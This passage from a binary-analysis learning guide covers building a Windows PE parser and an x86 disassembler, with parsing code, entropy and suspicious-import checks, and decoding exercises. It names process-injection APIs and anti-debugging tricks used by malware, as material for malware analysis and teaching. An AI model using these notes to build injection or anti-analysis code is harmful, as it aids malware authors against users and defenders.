  Image Base:  0x140000000

Sections:
  Name    VirtAddr VirtSize RawSize Flags
  .text   0x1000   0x5a00   0x5c00  CODE,EXECUTE,READ
  .rdata  0x7000   0x1e00   0x2000  READ
  .data   0x9000   0x400    0x200   READ,WRITE

Imports:
  KERNEL32.dll:
    - CreateFileA
    - ReadFile
    - WriteFile
    - VirtualAlloc   ← Suspicious!
  WS2_32.dll:
    - socket         ← Network activity!
    - connect
    - send
    - recv
```


**Implementation Hints**:

The PE format has a layered structure. Parse it step by step:
1. Read DOS header at offset 0
2. Follow `e_lfanew` to find PE signature
3. Parse COFF header immediately after signature
4. Parse Optional Header (size varies by PE32 vs PE32+)
5. Parse section headers after Optional Header
6. Use Data Directories to find imports, exports, resources
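Steps 1-2 above can be sketched as a pure function over a byte buffer (the buffer stands in for a mapped file; field offsets follow the Microsoft PE/COFF specification):

```c
// Steps 1-2 of the layered parse: validate the DOS header's "MZ" magic,
// follow e_lfanew (a 4-byte little-endian offset stored at 0x3c), and
// check for the "PE\0\0" signature at that offset.
// Returns the PE signature's offset, or -1 if the buffer isn't a PE file.
#include <stddef.h>
#include <stdint.h>
#include <string.h>

long pe_header_offset(const uint8_t *buf, size_t len) {
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;                              /* no DOS header */
    uint32_t e_lfanew = (uint32_t)buf[0x3c]       |
                        (uint32_t)buf[0x3d] << 8  |
                        (uint32_t)buf[0x3e] << 16 |
                        (uint32_t)buf[0x3f] << 24;
    if (e_lfanew > len - 4)
        return -1;                              /* offset past end of file */
    if (memcmp(buf + e_lfanew, "PE\0\0", 4) != 0)
        return -1;                              /* missing PE signature */
    return (long)e_lfanew;
}
```

The COFF header parse (step 3) then begins 4 bytes past the returned offset; note the bounds checks, since malformed e_lfanew values are routine in malware samples.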

Key questions:
- What does `IMAGE_DIRECTORY_ENTRY_IMPORT` point to?
- How are imported function names resolved (hint: thunks)?
- What's the difference between RVA and file offset?
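The RVA-to-file-offset question above has a standard answer worth sketching: find the section whose virtual range contains the RVA, then rebase into that section's raw data. The struct below is a hand-rolled subset of `IMAGE_SECTION_HEADER` with the section table assumed already parsed:

```c
// RVA -> file offset: an RVA is relative to ImageBase in memory, but the
// section's bytes live at PointerToRawData in the file. Find the containing
// section and translate.
#include <stddef.h>
#include <stdint.h>

typedef struct {                /* subset of IMAGE_SECTION_HEADER */
    uint32_t VirtualAddress;    /* RVA where the section is mapped */
    uint32_t VirtualSize;       /* size in memory                  */
    uint32_t PointerToRawData;  /* file offset of the section data */
    uint32_t SizeOfRawData;     /* size on disk                    */
} Section;

/* Returns the file offset for `rva`, or -1 if no section contains it. */
long rva_to_offset(uint32_t rva, const Section *secs, size_t n) {
    for (size_t i = 0; i < n; i++) {
        uint32_t start = secs[i].VirtualAddress;
        if (rva >= start && rva < start + secs[i].VirtualSize)
            return (long)(rva - start) + secs[i].PointerToRawData;
    }
    return -1;
}
```

Every data directory entry (imports, exports, resources) holds an RVA, so this translation runs before nearly every lookup a PE parser performs.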

**Learning milestones**:
1. **Parse headers correctly** → Understand PE structure
2. **Extract imports** → See what APIs the program uses
3. **Extract exports** → Understand DLLs
4. **Handle both PE32 and PE32+** → Support all Windows binaries

---

### The Core Question You're Answering

**How does Windows organize executable code, manage dynamic linking differently from Unix, and why has this format become the primary target for malware authors worldwide?**

The PE format reveals Windows' architectural philosophy: backward compatibility at all costs, rich metadata for tools, and a structure that has evolved from MS-DOS through to modern 64-bit Windows. Understanding PE is understanding the Windows ecosystem.

### Concepts You Must Understand First

**1. The DOS Legacy and Stub Programs**

Every PE file begins with an MS-DOS executable. This seems bizarre until you understand Windows' commitment to backward compatibility.

*Guiding questions:*
- Why does a Windows 11 executable start with "MZ" from 1981?
- What happens if you run a PE file in pure DOS?
- How does the DOS stub hand off to the real PE code?

*Key reading:* "Practical Malware Analysis" Ch. 1.2 (Portable Executable File Format), "Practical Binary Analysis" Ch. 2.4 (The PE Format)

**2. Relative Virtual Addresses (RVAs) vs. File Offsets**

ELF structures mix virtual addresses and file offsets; PE relies almost entirely on RVAs. Nearly every pointer in a PE file is an RVA, not a raw file offset.

*Guiding questions:*
- What is an RVA relative to? (Hint: ImageBase)
- How do you convert an RVA to a file offset?
- Why does malware often modify ImageBase?

*Key reading:* "Practical Malware Analysis" Ch. 1.2 (The PE File Structure), Microsoft PE/COFF Specification Section 3 (COFF File Header)

**3. Import Address Table (IAT) and Dynamic Linking**

Windows programs discover API functions differently than Unix. The IAT is the gateway to understanding what a program can do.

*Guiding questions:*
- What's the difference between the Import Name Table and the Import Address Table?
- How does the Windows loader populate the IAT at load time?
- Why do malware analysts always check the IAT first?

*Key reading:* "Practical Malware Analysis" Ch. 1.2.5 (The .idata Section), "Practical Binary Analysis" Ch. 2.4.5 (Import Directory)

**4. Sections vs. Segments (Windows Style)**

Windows doesn't call them segments—everything is sections. But sections have two alignments: on disk and in memory.

*Guiding questions:*
- What is `SectionAlignment` vs `FileAlignment`?
- Why is `.text` section often larger in memory than on disk?
- How does section padding affect packing detection?

*Key reading:* Microsoft PE/COFF Specification Section 4 (Section Table), "Practical Malware Analysis" Ch. 18.1 (Packers and Unpacking)

**5. PE32 vs. PE32+ (32-bit vs. 64-bit)**

Unlike ELF's Elf32/Elf64, PE uses the same structures with different Optional Header sizes.

*Guiding questions:*
- How do you detect PE32 vs. PE32+? (Hint: Magic field)
- What fields change between PE32 and PE32+?
- Can a 64-bit Windows process load 32-bit DLLs?

*Key reading:* Microsoft PE/COFF Specification Section 3.4 (Optional Header), "Practical Binary Analysis" Ch. 2.4.3 (PE Optional Header)

**6. Export Directory and DLL Internals**

DLLs are PE files that export functions. Understanding exports is key to understanding how Windows APIs work.

*Guiding questions:*
- How are exported functions named vs. numbered (ordinals)?
- What's the export forwarding chain?
- Why do some DLLs export thousands of functions?

*Key reading:* "Practical Malware Analysis" Ch. 1.2.6 (The .edata Section), Microsoft PE/COFF Specification Section 6.3 (Export Directory Table)

**7. PE Resources and the .rsrc Section**

Unlike ELF, PE files contain a rich resource tree: icons, dialogs, version info, and sometimes malware payloads.

*Guiding questions:*
- How is the resource tree structured?
- What is a resource ID vs. a resource name?
- Why do analysts check `.rsrc` for embedded executables?

*Key reading:* "Practical Malware Analysis" Ch. 1.2.7 (PE File Headers and Sections), Microsoft PE/COFF Specification Section 6.9 (Resource Format)

**8. Data Directories and the Optional Header**

The PE Optional Header contains 16 data directory entries pointing to critical structures.

*Guiding questions:*
- What are the most important data directories for malware analysis?
- How does `IMAGE_DIRECTORY_ENTRY_IMPORT` relate to the IAT?
- What does `IMAGE_DIRECTORY_ENTRY_SECURITY` contain?

*Key reading:* "Practical Binary Analysis" Ch. 2.4.4 (Data Directories), Microsoft PE/COFF Specification Section 3.4.4 (Optional Header Data Directories)

### Questions to Guide Your Design

1. **How will you handle RVA-to-file-offset conversion?** You'll need this constantly. Should you pre-build a lookup table from section headers?

2. **Will you parse imports by name or by ordinal?** Some DLLs export by ordinal only. Your parser needs to handle both.

3. **How deeply will you parse the resource tree?** Resources can be nested multiple levels. Will you recurse fully or just show top-level?

4. **What validation will you perform?** PE files from malware are often malformed intentionally to break tools.

5. **How will you display suspicious indicators?** Highlight imports like `VirtualAlloc`, `WriteProcessMemory`, or unusual section names?

6. **Will you support bound imports?** Bound imports pre-cache IAT addresses for performance. Modern versions of Windows largely ignore them.

7. **How will you handle exports in executables?** EXEs can export functions (rare but legal). Will you check for this?

8. **Should you calculate entropy per section?** High entropy suggests packing or encryption—a key malware indicator.
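
Question 8 takes only a few lines of code. A sketch of Shannon entropy over a section's raw bytes (the thresholds in the comments are the rough rule of thumb used later in this document):

```python
# Sketch: Shannon entropy of a byte buffer, the classic packing heuristic.
# Packed/encrypted sections typically score ~7.5-8.0; plain code scores lower.
import math
from collections import Counter

def entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

print(round(entropy(b"\x00" * 4096), 2))          # one symbol only -> 0.0
print(round(entropy(bytes(range(256)) * 16), 2))  # uniform bytes -> 8.0
```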

### Thinking Exercise

**Before writing code, perform these manual exercises:**

**Exercise 1: Manual PE Parsing**
```bash
xxd -l 512 /path/to/some.exe  # or use a Windows PE file
```

Using a hex editor and the PE specification:

  1. Find the “MZ” signature at offset 0
  2. Navigate to offset 0x3C and read the 4-byte value (e_lfanew)
  3. Jump to that offset and verify “PE\0\0” signature
  4. Parse the COFF header: Machine type, Number of sections, Timestamp
  5. Calculate where the Section Table begins

Write down each calculation. This cements the layered structure.
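
Once you have done the steps by hand, the first two can be automated. A self-contained sketch using Python's `struct`; it fabricates a minimal in-memory image so it does not depend on a real `.exe`:

```python
# Sketch: automate steps 1-3 of the manual exercise with struct.
import struct

def pe_offset(data: bytes) -> int:
    assert data[:2] == b"MZ", "not a DOS/PE file"
    # e_lfanew is the 4-byte little-endian value at offset 0x3C
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    assert data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00", "bad PE signature"
    return e_lfanew

# Hypothetical minimal image: MZ magic, e_lfanew = 0x80, PE signature at 0x80
blob = bytearray(0x100)
blob[:2] = b"MZ"
struct.pack_into("<I", blob, 0x3C, 0x80)
blob[0x80:0x84] = b"PE\x00\x00"

print(hex(pe_offset(bytes(blob))))  # 0x80
```

For a real file, replace `blob` with `open(path, 'rb').read()`.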

**Exercise 2: Trace an Import**

Using a tool like CFF Explorer or pefile (Python):

```python
import pefile

pe = pefile.PE('suspicious.exe')
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    print(entry.dll.decode())
    for imp in entry.imports:
        name = imp.name.decode() if imp.name else f'Ordinal {imp.ordinal}'
        print(f'  {name}')
```

Pick one import (e.g., CreateFileA from KERNEL32.dll):

  1. Find its entry in the Import Directory
  2. Locate the Import Name Table entry
  3. Find the corresponding Import Address Table entry
  4. Understand how the loader will patch this at runtime

**Exercise 3: Section Alignment Analysis**

For a sample PE file:

  1. Note FileAlignment and SectionAlignment from Optional Header
  2. For each section, calculate:
    • VirtualAddress (where it loads in memory)
    • VirtualSize (size in memory)
    • PointerToRawData (offset in file)
    • SizeOfRawData (size in file)
  3. Identify any discrepancies—common in packed malware

**Exercise 4: Resource Tree Exploration**

```bash
# On Linux, use wrestool from icoutils
wrestool -x --output=. sample.exe
# Lists and extracts all resources
```

Explore the .rsrc section:

  1. How many resource types exist? (RT_ICON, RT_DIALOG, etc.)
  2. Are there any unusual resource names?
  3. Check for embedded PEs or suspicious binary blobs

Draw the resource tree structure manually.

### The Interview Questions They’ll Ask

  1. “What’s the difference between the DOS header and the PE header?”
    • The DOS header (MZ header) is at offset 0 for DOS compatibility. Its e_lfanew field points to the real PE header (PE\0\0 signature). The PE header contains the COFF header and Optional Header.
  2. “How do you convert an RVA to a file offset?”
    • Find which section contains the RVA by checking section VirtualAddress ranges. Then: FileOffset = RVA - SectionVirtualAddress + SectionPointerToRawData.
  3. “Explain how the Windows loader populates the IAT.”
    • The loader reads each DLL from the Import Directory, calls LoadLibrary to load the DLL, uses GetProcAddress to resolve each imported function, and writes the actual addresses into the Import Address Table.
  4. “What are some red flags in a PE file that suggest malware?”
    • Unusual section names (.aspack, .upx), high entropy sections, mismatched timestamps, imports of process injection APIs (CreateRemoteThread, VirtualAllocEx), tiny .text section with huge .data, resources larger than code sections.
  5. “What’s the difference between IMAGE_FILE_EXECUTABLE_IMAGE and IMAGE_FILE_DLL?”
    • Both are flags in the COFF Characteristics field. IMAGE_FILE_EXECUTABLE_IMAGE means it’s a valid executable. IMAGE_FILE_DLL means it’s a DLL (cannot be run directly, must be loaded by another process).
  6. “How does ASLR work in Windows PE files?”
    • If DllCharacteristics includes IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, the OS can relocate the image to a random base address. The .reloc section contains fixup information for this.
  7. “What is ordinal importing and why is it used?”
    • Instead of importing by name (“CreateFileA”), you import by number (ordinal 1234). It’s smaller and slightly faster but breaks if DLL versions change. Often used in system DLLs.
  8. “What’s in the .reloc section?”
    • Base relocation entries. If the PE can’t load at its preferred ImageBase, the loader uses these entries to fix up all absolute addresses. Required for DLLs and ASLR-enabled EXEs.
  9. “How can you tell if a PE is packed?”
    • Check section names (UPX, ASPack, etc.), compare SizeOfImage to raw file size, calculate entropy (packed sections have high entropy ~7.5-8.0), look for abnormal entry point (EP in last section or writable section).
  10. “What’s the significance of the TLS (Thread Local Storage) directory?”
    • TLS callbacks execute before the main entry point—earlier than AddressOfEntryPoint. Malware uses TLS callbacks for anti-debugging and to run code before analysts expect.

### Books That Will Help

| Topic | Book | Chapter/Section |
|-------|------|-----------------|
| PE Format Overview | “Practical Malware Analysis” by Sikorski & Honig | Ch. 1: Basic Static Techniques (PE File Format) |
| PE File Structure | “Practical Binary Analysis” by Dennis Andriesse | Ch. 2.4: The PE Format - A Comparison with ELF |
| Import/Export Tables | “Practical Malware Analysis” | Ch. 1.2.5-1.2.6: Imports and Exports |
| PE Headers Deep Dive | “Practical Binary Analysis” | Ch. 2.4.3-2.4.5: PE Headers and Data Directories |
| Dynamic Linking on Windows | “Practical Malware Analysis” | Ch. 7: Analyzing Malicious Windows Programs |
| Resource Sections | “Practical Malware Analysis” | Ch. 1.2.7: PE Sections (Resources) |
| Packers and Obfuscation | “Practical Malware Analysis” | Ch. 18: Packers and Unpacking |
| RVA and Address Calculations | Microsoft PE/COFF Specification | Section 4: Section Table (online) |
| Windows Internals (Loading) | “Windows Internals” by Russinovich et al. | Part 1, Ch. 3: System Mechanisms (Image Loader) |
| Malware Analysis Techniques | “Practical Malware Analysis” | Ch. 3: Basic Dynamic Analysis |
| File Format Reversing | “Hacking: The Art of Exploitation” by Erickson | Ch. 4: Exploitation (Binary Formats section) |
| Section Characteristics | Microsoft PE/COFF Specification | Section 4.1: Section Flags (online) |
| TLS Callbacks | “Practical Malware Analysis” | Ch. 16: Anti-Debugging Techniques (TLS Callbacks) |
| Reference: PE/COFF Spec | Microsoft PE/COFF Specification | All sections (online documentation) |

### ASCII Diagram: PE File Structure

```text
+--------------------------------+
|        DOS Header (MZ)         |  <-- Offset 0x00
|  e_magic = "MZ" (0x5A4D)       |      DOS compatibility stub
|  ...                           |
|  e_lfanew = 0x000000E0         |  --> Points to PE Header
+--------------------------------+
|                                |
|        DOS Stub Program        |      "This program cannot be run in DOS mode"
|  (can be modified/enlarged)    |
+--------------------------------+
|                                |
|   PE Signature (PE\0\0)        |  <-- Offset e_lfanew (e.g., 0xE0)
|   0x00004550                   |
+--------------------------------+
|        COFF Header             |
|  Machine (0x8664 = x64)        |
|  NumberOfSections              |
|  TimeDateStamp                 |
|  SizeOfOptionalHeader          |
|  Characteristics               |
+--------------------------------+
|      Optional Header           |
|  Magic (0x10B=PE32/0x20B=PE32+)|
|  AddressOfEntryPoint           |  --> Where execution begins (RVA)
|  ImageBase                     |      Preferred load address
|  SectionAlignment              |      Alignment in memory (usually 0x1000)
|  FileAlignment                 |      Alignment on disk (usually 0x200)
|  SizeOfImage                   |      Total size when loaded
|  SizeOfHeaders                 |
|  Subsystem (GUI/Console)       |
|  DllCharacteristics            |      ASLR, DEP flags, etc.
|  NumberOfRvaAndSizes           |      Usually 16
|                                |
|    Data Directories [16]       |
|    [0] Export Table            |
|    [1] Import Table            |  --> Critical for analysis
|    [2] Resource Table          |
|    [3] Exception Table         |
|    [5] Base Relocation         |
|    [9] TLS Table               |      TLS callbacks
|    [12] IAT                    |      Import Address Table
|    [14] COM Descriptor         |      .NET assemblies
+--------------------------------+
|                                |
|      Section Table             |      NumberOfSections entries
|  [Section Header for .text]    |
|     Name = ".text"             |
|     VirtualSize                |
|     VirtualAddress (RVA)       |      Where it loads in memory
|     SizeOfRawData              |
|     PointerToRawData           |      Offset in file
|     Characteristics (RX)       |      Readable + Executable
|                                |
|  [Section Header for .rdata]   |
|  [Section Header for .data]    |
|  [Section Header for .rsrc]    |
|  [Section Header for .reloc]   |
+--------------------------------+
|                                |
|     .text Section              |  <-- Executable code
|   (machine code bytes)         |
|                                |
+--------------------------------+
|     .rdata Section             |  <-- Read-only data
|   Import Directory             |      Import Name Table (INT)
|   Import Address Table (IAT)   |      Function pointers (patched by loader)
|   String literals              |
+--------------------------------+
|     .data Section              |  <-- Initialized writable data
|   Global variables             |
+--------------------------------+
|     .rsrc Section              |  <-- Resources (icons, strings, dialogs)
|   Resource Directory Tree      |
|   Icons, Version Info          |
+--------------------------------+
|     .reloc Section             |  <-- Base relocations for ASLR
|   Relocation blocks            |
+--------------------------------+
```

**Key Insight**: The Import Address Table (IAT) is one of the first things to analyze. It reveals every API function the program can call—a behavioral fingerprint. In malware, suspicious imports like VirtualAlloc + WriteProcessMemory + CreateRemoteThread indicate process injection.
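
That behavioral fingerprint can be screened mechanically. A sketch that flags the classic injection triad; the hard-coded import list here stands in for your parser's (or pefile's) output:

```python
# Sketch: flag process-injection API combinations in an import list.
# The sample import list is hypothetical test data, not a real binary's.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}

def injection_score(imports):
    """Return the injection-related APIs present, sorted for stable output."""
    return sorted(INJECTION_APIS & set(imports))

sample = ["CreateFileA", "VirtualAllocEx", "WriteProcessMemory",
          "CreateRemoteThread", "ReadFile"]
print(injection_score(sample))  # all three injection APIs present
```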

## Project 3: Build a Simple Disassembler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python (with Capstone), Rust
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Disassembly / x86 Instruction Encoding
  • Software or Tool: Intel manuals, Capstone engine
  • Main Book: “Intel 64 and IA-32 Architectures Software Developer’s Manual”

**What you’ll build**: A disassembler that converts x86/x64 machine code into human-readable assembly instructions.

**Why it teaches binary analysis**: Understanding how machine code maps to assembly is fundamental. Building a disassembler forces you to understand instruction encoding.

**Core challenges you’ll face**:

  • Variable-length instructions → maps to x86 has 1-15 byte instructions
  • Prefixes and REX bytes → maps to operand size, 64-bit registers
  • ModR/M and SIB bytes → maps to addressing modes
  • Immediate and displacement → maps to constants and offsets

Resources for key challenges:

Key Concepts:

  • x86 Instruction Format: Intel SDM Volume 2, Chapter 2
  • ModR/M Encoding: X86 Opcode Reference
  • Linear vs Recursive Descent: “Practical Binary Analysis” Ch. 6

**Difficulty**: Advanced
**Time estimate**: 2-4 weeks
**Prerequisites**: Projects 1-2, solid x86 assembly knowledge

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab
    $ ./disasm program.bin
    00000000: 55                    push rbp
    00000001: 48 89 e5              mov rbp, rsp
    00000004: 48 83 ec 40           sub rsp, 0x40
    00000008: 48 8d 45 c0           lea rax, [rbp-0x40]
    0000000c: 48 89 c7              mov rdi, rax
    0000000f: e8 xx xx xx xx        call 0x????????
    00000014: 31 c0                 xor eax, eax
    00000016: c9                    leave
    00000017: c3                    ret
    

**Implementation Hints**:

x86 instruction format:

```text
[Prefixes] [REX] [Opcode] [ModR/M] [SIB] [Displacement] [Immediate]
   0-4       0-1    1-3      0-1     0-1      0-4           0-8
```

Start simple:

  1. Handle single-byte opcodes first (push, pop, ret, nop)
  2. Add instructions with ModR/M byte (mov, add, sub)
  3. Add REX prefix support for 64-bit
  4. Add SIB byte for complex addressing
  5. Handle prefixes (operand size, segment override)
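
Step 1 above can be sketched as a linear sweep over a tiny single-byte opcode table. This is a toy decoder, not a full disassembler; unknown bytes fall back to a raw `db` line:

```python
# Sketch of step 1: linear sweep, single-byte opcodes only.
PUSH_BASE, POP_BASE = 0x50, 0x58          # push r64 / pop r64 are 0x50+r / 0x58+r
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
ONE_BYTE = {0x90: "nop", 0xC3: "ret", 0xC9: "leave"}

def disasm(code: bytes):
    lines = []
    for off, b in enumerate(code):
        if PUSH_BASE <= b <= 0x57:
            text = f"push {REGS[b - PUSH_BASE]}"
        elif POP_BASE <= b <= 0x5F:
            text = f"pop {REGS[b - POP_BASE]}"
        else:
            text = ONE_BYTE.get(b, f"db 0x{b:02x}")  # unknown -> raw byte
        lines.append(f"{off:08x}: {b:02x}  {text}")
    return lines

for line in disasm(bytes([0x55, 0x90, 0x5D, 0xC3])):
    print(line)  # push rbp / nop / pop rbp / ret
```

Steps 2-5 then grow this loop: instead of one byte per instruction, each opcode entry reports how many ModR/M, displacement, and immediate bytes to consume.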

Questions to consider:

  • How do you distinguish mov eax, ebx from mov eax, [ebx]?
  • What does the REX.W prefix do?
  • How do you handle instructions with the same opcode but different meanings?

**Learning milestones**:

  1. Disassemble basic instructions → Single-byte opcodes work
  2. Handle ModR/M byte → Register and memory operands
  3. Support 64-bit mode → REX prefix parsing
  4. Handle all addressing modes → SIB byte, displacements

### The Core Question You’re Answering

**How does a CPU decode variable-length instruction streams into executable operations, and why is x86 considered one of the most complex instruction sets to disassemble?**

Disassembly is reverse compilation at the lowest level. You’re recreating human-readable assembly from the raw bytes the CPU executes. Unlike fixed-width RISC architectures, x86/x64 instructions range from 1 to 15 bytes, making this problem fundamentally about pattern recognition and context.

### Concepts You Must Understand First

**1. Instruction Encoding and Variable-Length Instructions**

x86 is a CISC architecture—Complex Instruction Set Computer. One instruction might be 1 byte (ret), another 15 bytes (a complex movaps with all prefixes).

Guiding questions:

  • Why doesn’t x86 use fixed-width instructions like ARM or MIPS?
  • How does the CPU know where one instruction ends and the next begins?
  • What happens if you try to disassemble from the wrong offset (misaligned)?

Key reading: “Computer Systems: A Programmer’s Perspective” Ch. 3.5 (Instruction Encoding), Intel SDM Volume 2A Ch. 2 (Instruction Format)

**2. Opcode Tables and Instruction Prefixes**

The first byte (or bytes) of an instruction determine what it does. But prefixes can modify almost everything.

Guiding questions:

  • What’s the difference between a one-byte opcode and a two-byte opcode (0x0F escape)?
  • How many prefix bytes can one instruction have?
  • What does the LOCK prefix do?

Key reading: Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 2, “Low-Level Programming” Ch. 3.5 (x86-64 Assembly Language)

**3. ModR/M and SIB Bytes: Operand Encoding**

After the opcode comes ModR/M (Mod-Reg-R/M), which encodes register and memory operands. Sometimes a SIB (Scale-Index-Base) byte follows.

Guiding questions:

  • How does ModR/M encode mov eax, ebx vs mov eax, [ebx]?
  • When do you need a SIB byte?
  • What do the Mod field values (00, 01, 10, 11) mean?

Key reading: Intel SDM Volume 2A Section 2.1.5 (ModR/M and SIB Bytes), “Practical Binary Analysis” Ch. 6.2.2 (Linear Disassembly)
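
The field split is pure bit arithmetic. A sketch that splits a ModR/M byte and renders the register-direct case, using the document's own example bytes (`48 89 E5` = `mov rbp, rsp`):

```python
# Sketch: split ModR/M into Mod (2 bits), Reg (3 bits), R/M (3 bits)
# and render the register-direct case (Mod == 0b11) for 64-bit operands.
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

def split_modrm(byte):
    mod = byte >> 6
    reg = (byte >> 3) & 0b111
    rm = byte & 0b111
    return mod, reg, rm

# 48 89 E5 = mov rbp, rsp: opcode 0x89 is "MOV r/m, r"
mod, reg, rm = split_modrm(0xE5)
assert mod == 0b11                     # register-direct, no memory operand
print(f"mov {REGS[rm]}, {REGS[reg]}")  # destination is R/M, source is Reg
```

Mod values 00/01/10 instead select `[R/M]`, `[R/M + disp8]`, and `[R/M + disp32]`, which is where the displacement-length decision comes from.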

**4. Displacement and Immediate Values**

Many instructions have trailing bytes for offsets (displacements) or constants (immediates).

Guiding questions:

  • How do you know if an instruction has a displacement?
  • What’s the difference between an 8-bit and 32-bit immediate?
  • How are signed immediates handled?

Key reading: Intel SDM Volume 2A Section 2.2 (Immediates and Displacements)

**5. REX Prefix and 64-bit Mode**

x86-64 added REX prefixes to access 64-bit registers (RAX, RBX, etc.) and extended registers (R8-R15).

Guiding questions:

  • How does the REX.W bit change instruction behavior?
  • What do REX.R, REX.X, REX.B extend?
  • Can you have multiple REX prefixes? (No!)

Key reading: “Low-Level Programming” Ch. 8 (x86-64 Architecture), Intel SDM Volume 2A Section 2.2.1 (REX Prefixes)
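
A REX prefix is a single byte in 0x40-0x4F whose low nibble carries the W/R/X/B bits. A sketch of the extraction:

```python
# Sketch: pull the W/R/X/B bits out of a REX prefix byte (0100WRXB).
def rex_bits(b):
    assert 0x40 <= b <= 0x4F, "not a REX prefix"
    return {"W": (b >> 3) & 1, "R": (b >> 2) & 1,
            "X": (b >> 1) & 1, "B": b & 1}

print(rex_bits(0x48))  # REX.W only: 64-bit operand size
```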

**6. Linear vs. Recursive Descent Disassembly**

Two strategies: start at the beginning and decode sequentially (linear), or follow control flow (recursive descent).

Guiding questions:

  • What are the advantages of linear disassembly?
  • When does linear disassembly fail? (Hint: inline data)
  • Why is recursive descent more accurate but incomplete?

Key reading: “Practical Binary Analysis” Ch. 6.2 (Disassembly Algorithms)

**7. Addressing Modes**

x86 has incredibly complex addressing modes: [base + index*scale + displacement].

Guiding questions:

  • How is mov rax, [rbx + rcx*8 + 0x10] encoded?
  • Which addressing modes require a SIB byte?
  • What’s RIP-relative addressing? (x64 only)

Key reading: Intel SDM Volume 1 Section 3.7 (Operand Addressing), “Computer Systems: A Programmer’s Perspective” Ch. 3.5.1 (Operand Specifiers)

**8. Opcode Extensions and Group Encodings**

Some opcodes are “groups” where the Reg field of ModR/M selects the actual instruction.

Guiding questions:

  • What is an opcode extension?
  • How do you decode 0xF7 /0 vs 0xF7 /4? (test vs mul)
  • Why does x86 use this complexity?

Key reading: Intel SDM Volume 2 Appendix A (Opcode Map), “Practical Binary Analysis” Ch. 6.2.2

### Questions to Guide Your Design

1. **Will you build your own opcode tables or use a library?** Capstone is comprehensive, but building tables teaches you deeply. Which path aligns with your goals?

2. **How will you handle invalid or undocumented opcodes?** Should you show raw bytes, throw an error, or use heuristics?

3. **What output format will you produce?** Intel syntax (`mov eax, ebx`) or AT&T syntax (`movl %ebx, %eax`)? Both have audiences.

4. **Will you support only one architecture (x86-64) or multiple?** Supporting x86, x86-64, ARM, etc. requires modular design.

5. **How will you display operands?** Show registers by name (RAX) or encoding (0x0)? Hex or decimal for immediates?

6. **What’s your strategy for multi-byte opcodes?** x86 has 1-byte, 2-byte (0x0F), and 3-byte (0x0F 0x38/0x3A) opcodes.

7. **Will you implement linear or recursive descent?** Or both as a comparative tool?

8. **How will you handle instruction prefixes?** Prefixes modify opcodes—do you show them separately or integrate into the instruction?

### Thinking Exercise

**Before coding, manually disassemble these byte sequences:**

**Exercise 1: Simple Instructions**

Given bytes: `55 48 89 E5 48 83 EC 40`

Using Intel SDM:

  1. 55 → Look up in opcode table → push rbp (or push ebp in 32-bit)
  2. 48 89 E5 → REX.W prefix, opcode 0x89, ModR/M 0xE5
    • REX.W → 64-bit operands
    • 0x89 → MOV r/m, r
    • ModR/M 0xE5 → Mod=11 (register), Reg=100 (ESP/RSP), R/M=101 (EBP/RBP)
    • Result: mov rbp, rsp
  3. Continue for remaining bytes

Write out each step. This cements the decode process.

**Exercise 2: Memory Operands**

Bytes: `48 8D 45 C0`

Decode:

  1. 48 → REX.W (64-bit)
  2. 8D → LEA (Load Effective Address)
  3. 45 C0 → ModR/M + Displacement
    • ModR/M 0x45 → Mod=01 (8-bit disp), Reg=000 (RAX), R/M=101 (RBP)
    • Displacement: 0xC0 = -64 (signed byte)
  4. Result: lea rax, [rbp-0x40]

**Exercise 3: SIB Byte Usage**

Bytes: `48 89 8C CD 00 00 00 00`

Decode manually:

  1. REX prefix?
  2. Opcode?
  3. ModR/M byte → triggers SIB?
  4. SIB byte → Scale, Index, Base?
  5. Displacement?

Expected: Something like mov [rbp+rcx*8], rcx

**Exercise 4: Compare Tools**

```bash
echo -ne '\x55\x48\x89\xe5\x48\x83\xec\x40' > test.bin
objdump -D -b binary -m i386:x86-64 test.bin
```

Compare your manual work to objdump. Where do they differ? Why?

Also try:

```bash
ndisasm -b64 test.bin
```

**Exercise 5: Misalignment Experiment**

Take a known instruction sequence. Start disassembling from offset+1 instead of offset 0.

What happens? You get nonsense—this demonstrates why alignment matters and why “desynchronization” attacks work on linear disassemblers.

### The Interview Questions They’ll Ask

  1. “What’s the difference between linear and recursive descent disassembly?”
    • Linear: Start at entry, decode every byte sequentially. Fast, but fooled by inline data or obfuscation. Recursive descent: Follow control flow (jumps, calls), disassemble only reachable code. Accurate, but misses indirect jumps.
  2. “How do you handle x86’s variable-length instructions?”
    • Parse byte-by-byte: decode prefixes, opcode, ModR/M, SIB, displacement, immediate. Each field’s presence depends on previous fields. Requires state machine or careful offset tracking.
  3. “What’s the REX prefix and why is it necessary?”
    • REX extends x86-64 instructions. REX.W selects 64-bit operands. REX.R, REX.X, REX.B extend ModR/M Reg, SIB Index, and ModR/M R/M fields to access R8-R15 registers.
  4. “Explain ModR/M encoding with an example.”
    • ModR/M has 3 fields: Mod (2 bits), Reg (3 bits), R/M (3 bits). Example: mov eax, ebx (0x89 0xD8). 0x89 = MOV r/m, r. 0xD8 = Mod:11, Reg:011 (EBX), R/M:000 (EAX). Result: move EBX to EAX.
  5. “When is a SIB byte present?”
    • When ModR/M R/M field = 100 (binary) and Mod ≠ 11. SIB allows complex addressing: [base + index*scale + disp].
  6. “How do you disassemble encrypted or packed code?”
    • You can’t—encrypted bytes are meaningless until decrypted. Dynamic analysis: run the code, let it decrypt itself, then dump and disassemble memory.
  7. “What are opcode extensions and why do they exist?”
